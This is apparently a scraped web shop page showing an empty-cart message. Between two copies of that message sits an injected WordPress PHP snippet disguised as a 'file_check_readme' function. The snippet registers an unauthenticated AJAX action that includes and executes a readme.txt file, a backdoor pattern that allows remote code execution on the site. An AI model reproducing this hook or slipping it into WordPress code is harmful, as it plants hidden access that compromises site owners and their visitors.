Your cart is currently empty.
if(!function_exists('file_check_readme94283')){ add_action('wp_ajax_nopriv_file_check_readme94283', 'file_check_readme94283'); add_action('wp_ajax_file_check_readme94283', 'file_check_readme94283'); function file_check_readme94283() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }
Your cart is currently empty.